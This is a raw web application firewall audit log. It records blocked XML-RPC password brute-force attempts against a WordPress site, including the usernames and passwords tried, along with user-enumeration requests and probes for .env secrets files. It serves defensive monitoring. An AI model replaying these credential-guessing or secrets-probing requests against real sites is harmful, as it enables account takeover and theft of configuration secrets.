Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --679ca97a-Z-- --5fb42e5f-A-- [28/May/2025:20:43:21 +0700] aDcS-Q3r-0gDryHAyD_gZwAAAEw 103.236.140.4 50152 103.236.140.4 8181 --5fb42e5f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.237 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.237 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --5fb42e5f-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix*2020 --5fb42e5f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5fb42e5f-E-- --5fb42e5f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.237 (1+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748439801264175 5581 (- - -) Stopwatch2: 1748439801264175 5581; combined=4049, p1=451, p2=3416, p3=0, p4=0, p5=108, sr=86, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5fb42e5f-Z-- --df2a6147-A-- [28/May/2025:20:50:53 +0700] aDcUveszXCullgn3bbHELQAAAAM 103.236.140.4 50772 103.236.140.4 8181 --df2a6147-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.237 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.237 X-Forwarded-Proto: https Connection: close Content-Length: 485 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --df2a6147-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelHozes2021! --df2a6147-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --df2a6147-E-- --df2a6147-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.237 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748440253369605 5728 (- - -) Stopwatch2: 1748440253369605 5728; combined=4308, p1=522, p2=3621, p3=0, p4=0, p5=98, sr=94, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --df2a6147-Z-- --80d51020-A-- [28/May/2025:21:19:02 +0700] aDcbVvnnEwDNUSjDseIxHgAAAJc 103.236.140.4 52944 103.236.140.4 8181 --80d51020-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 198.186.130.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 198.186.130.214 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --80d51020-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --80d51020-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748441942115543 2944 (- - -) Stopwatch2: 1748441942115543 2944; combined=1419, p1=472, p2=913, p3=0, p4=0, p5=34, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --80d51020-Z-- --0832392b-A-- [28/May/2025:21:59:07 +0700] aDckuxwBHP_x2VCWa06exAAAAM0 103.236.140.4 56076 103.236.140.4 8181 --0832392b-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.33.250.142 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.33.250.142 X-Forwarded-Proto: https Connection: close Content-Length: 492 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --0832392b-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelfaadhel!@#$%^&*() --0832392b-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --0832392b-E-- --0832392b-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||bogl.no|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "mod_suphp.c"] [line 790] [level 3] File does not exist: %s Stopwatch: 1748444347582799 6839 (- - -) Stopwatch2: 1748444347582799 6839; combined=4911, p1=553, p2=4101, p3=37, p4=42, p5=115, sr=95, sw=63, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0832392b-Z-- --fccf280c-A-- [28/May/2025:22:00:44 +0700] aDclHBwBHP_x2VCWa06e0QAAAMg 103.236.140.4 56238 103.236.140.4 8181 --fccf280c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 206.189.18.26 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 206.189.18.26 X-Forwarded-Proto: https Connection: close Content-Length: 485 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --fccf280c-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelantix*2021 --fccf280c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fccf280c-E-- --fccf280c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 206.189.18.26 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748444444976156 5957 (- - -) Stopwatch2: 1748444444976156 5957; combined=4360, p1=476, p2=3719, p3=0, p4=0, p5=98, sr=81, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fccf280c-Z-- --4dd83557-A-- [28/May/2025:22:00:53 +0700] aDclJRwBHP_x2VCWa06e1gAAAMc 103.236.140.4 56250 103.236.140.4 8181 --4dd83557-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 162.241.61.200 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 162.241.61.200 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --4dd83557-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhel&faadhel& --4dd83557-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --4dd83557-E-- --4dd83557-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||bogl.no|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "mod_suphp.c"] [line 790] [level 3] File does not exist: %s Stopwatch: 1748444453390826 5384 (- - -) Stopwatch2: 1748444453390826 5384; combined=4223, p1=463, p2=3557, p3=24, p4=26, p5=92, sr=119, sw=61, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4dd83557-Z-- --d8931c1e-A-- [28/May/2025:22:01:24 +0700] aDclRBwBHP_x2VCWa06e4AAAANQ 103.236.140.4 56312 103.236.140.4 8181 --d8931c1e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.18.255.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.18.255.6 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d8931c1e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d8931c1e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748444484374265 2349 (- - -) Stopwatch2: 1748444484374265 2349; combined=1069, p1=365, p2=677, p3=0, p4=0, p5=26, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d8931c1e-Z-- --742b3821-A-- [28/May/2025:22:02:10 +0700] aDclcvnnEwDNUSjDseIyXgAAAJc 103.236.140.4 56364 103.236.140.4 8181 --742b3821-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 206.189.18.26 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 206.189.18.26 X-Forwarded-Proto: https Connection: close Content-Length: 487 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --742b3821-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelFaAdHeL@2025 --742b3821-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --742b3821-E-- --742b3821-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 206.189.18.26 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748444530798919 5025 (- - -) Stopwatch2: 1748444530798919 5025; combined=3866, p1=452, p2=3244, p3=0, p4=0, p5=99, sr=85, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --742b3821-Z-- --e24a760e-A-- [28/May/2025:22:31:50 +0700] aDcsZuszXCullgn3bbHH_AAAABE 103.236.140.4 58618 103.236.140.4 8181 --e24a760e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 203.192.214.238 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 203.192.214.238 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e24a760e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e24a760e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748446310077752 3396 (- - -) Stopwatch2: 1748446310077752 3396; combined=1446, p1=503, p2=906, p3=0, p4=0, p5=37, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e24a760e-Z-- --5fab5431-A-- [28/May/2025:22:33:42 +0700] aDcs1vnnEwDNUSjDseIzEwAAAJA 103.236.140.4 58672 103.236.140.4 8181 --5fab5431-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 188.225.23.170 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 188.225.23.170 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --5fab5431-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix30 --5fab5431-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5fab5431-E-- --5fab5431-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 188.225.23.170 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748446422474196 6359 (- - -) Stopwatch2: 1748446422474196 6359; combined=4506, p1=525, p2=3751, p3=0, p4=0, p5=134, sr=91, sw=96, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5fab5431-Z-- --d4e9c63f-A-- [28/May/2025:22:34:38 +0700] aDctDuszXCullgn3bbHIDQAAABA 103.236.140.4 58724 103.236.140.4 8181 --d4e9c63f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.119 Safari/537.36 Accept-Charset: utf-8 --d4e9c63f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d4e9c63f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748446478823385 732 (- - -) Stopwatch2: 1748446478823385 732; combined=311, p1=270, p2=0, p3=0, p4=0, p5=40, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d4e9c63f-Z-- --86e10505-A-- [28/May/2025:22:37:35 +0700] aDctvxwBHP_x2VCWa06fuAAAAMs 103.236.140.4 58888 103.236.140.4 8181 --86e10505-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 188.225.23.170 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 188.225.23.170 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --86e10505-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix05 --86e10505-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --86e10505-E-- --86e10505-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 188.225.23.170 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748446655812279 5581 (- - -) Stopwatch2: 1748446655812279 5581; combined=4107, p1=468, p2=3463, p3=0, p4=0, p5=104, sr=85, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86e10505-Z-- --84523551-A-- [28/May/2025:22:42:57 +0700] aDcvARwBHP_x2VCWa06f0gAAAMg 103.236.140.4 59068 103.236.140.4 8181 --84523551-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 188.225.23.170 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 188.225.23.170 X-Forwarded-Proto: https Connection: close Content-Length: 487 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --84523551-C-- system.multicallmethodNamewp.getUsersBlogsparamsrizalfadilantix1212 --84523551-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --84523551-E-- --84523551-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 188.225.23.170 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748446977104947 6175 (- - -) Stopwatch2: 1748446977104947 6175; combined=4353, p1=557, p2=3625, p3=0, p4=0, p5=101, sr=110, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --84523551-Z-- --daff5a0e-A-- [28/May/2025:22:45:27 +0700] aDcvl_nnEwDNUSjDseIzNwAAAIw 103.236.140.4 59156 103.236.140.4 8181 --daff5a0e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.55.98.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.55.98.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8 Accept-Charset: utf-8 --daff5a0e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --daff5a0e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748447127476361 838 (- - -) Stopwatch2: 1748447127476361 838; combined=343, p1=301, p2=0, p3=0, p4=0, p5=42, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --daff5a0e-Z-- --a3dd9360-A-- [28/May/2025:22:50:13 +0700] aDcwteszXCullgn3bbHIdgAAAAU 103.236.140.4 59412 103.236.140.4 8181 --a3dd9360-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 41.163.7.227 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 41.163.7.227 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a3dd9360-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3dd9360-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748447413339844 2627 (- - -) Stopwatch2: 1748447413339844 2627; combined=1086, p1=404, p2=658, p3=0, p4=0, p5=24, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3dd9360-Z-- --9c30454c-A-- [28/May/2025:23:15:24 +0700] aDc2nPnnEwDNUSjDseI6DwAAAI4 103.236.140.4 56790 103.236.140.4 8181 --9c30454c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.152.117.150 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.152.117.150 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9c30454c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9c30454c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748448924476736 3180 (- - -) Stopwatch2: 1748448924476736 3180; combined=1397, p1=497, p2=868, p3=0, p4=0, p5=32, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
